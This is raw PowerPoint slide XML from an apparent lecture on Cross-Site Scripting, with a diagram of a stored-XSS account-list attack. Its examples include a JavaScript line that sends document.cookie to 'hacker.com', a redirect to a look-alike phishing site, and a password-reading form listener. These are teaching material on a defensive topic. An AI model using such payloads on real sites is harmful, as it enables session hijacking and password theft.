                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{013AE390-702E-4CEC-999A-FB417C4D4E8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7814430" y="3072733"/>
            <a:ext cx="2775667" cy="147732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POST</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create new account with a username containing bad JS code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4F4CC56-DF6C-487C-8D86-6F8DBBA87D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67823" y="1194908"/>
            <a:ext cx="1372107" cy="1373793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24A1BEDC-6877-4948-8CC7-F70A6E32235E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9753776" y="2337050"/>
            <a:ext cx="1600200"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Hacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{335A2C30-964B-47CA-B675-91E9C499F26D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10553876" y="2761782"/>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Arrow Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{704399B5-7DB9-4209-BAD1-222A0A65A2D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6178117" y="2920333"/>
            <a:ext cx="4246044" cy="147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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56542536-6C90-4FCF-B4DD-2D8CFADBBDD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2155532" y="2523242"/>
            <a:ext cx="2971703"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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The list of all accounts.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Arrow Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F96751D-243B-452C-A73D-A9EEB2DE9E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1702130" y="3484387"/>
            <a:ext cx="4246044" cy="1479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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C9B69E8-ACAF-4EB9-9EDC-585E3CDC8FA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3330660" y="3602342"/>
            <a:ext cx="265378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List of all accounts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With bad JS code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Connector 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BEFC184-F92F-47D3-8AA1-4625CEA5FE1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1722039" y="3734726"/>
            <a:ext cx="0" cy="1375754"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C28789CB-B64B-4594-80DC-132B25F4128F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="51821" y="3427523"/>
            <a:ext cx="1614042" cy="1477328"/>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Display list of all accounts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Executes bad JS code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Straight Arrow Connector 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC51E70E-4D0E-4C02-9120-402C30FBEE1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1722039" y="5208098"/>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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3D034ED-AF42-4F7F-8C3E-E46F2329CAFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731618" y="5304638"/>
            <a:ext cx="2454298" cy="120032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Send bad request</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server think it is intentionally sent by the client!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24817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16" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="29"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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="480131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>If you don't protect yourself against XSS:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1401417" y="2440693"/>
            <a:ext cx="9773478" cy="1815882"/>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a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> cookies = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Session id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "http://hacker.com?c="+cookies</a:t>
            </a:r>
          </a:p>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331842" y="4480658"/>
            <a:ext cx="10021957" cy="8679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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>The hacker (owner of hacker.com) now has the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>user's session id or auto-login information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5483525"/>
            <a:ext cx="10641496"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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Usually not a problem anymore: JS can't read HTTP Only Cookies.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402555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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="480131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>If you don't protect yourself against XSS:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1401417" y="2440693"/>
            <a:ext cx="9773478" cy="1355243"/>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a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "http://identical-site.com"</a:t>
            </a:r>
          </a:p>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331843" y="3971997"/>
            <a:ext cx="10021957" cy="99617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The user is redirected to the hackers identical looking website.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>When user signs in there  Hacker gets user's password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5249812"/>
            <a:ext cx="10641496" cy="4801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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>The URL in the address bar is different, but will the user notice?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2479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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="480131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>If you don't protect yourself against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1401417" y="2440693"/>
            <a:ext cx="9773478" cy="365843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a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('login').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addEventListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  'submit',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49"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function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    /* Read the user's password. */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>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410976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#1 Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Content Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B93FA9A-E123-4FAC-8BBD-7CEF83527D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="2031325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>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endParaRPr lang="en-US" i="1" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424167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Preventing XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
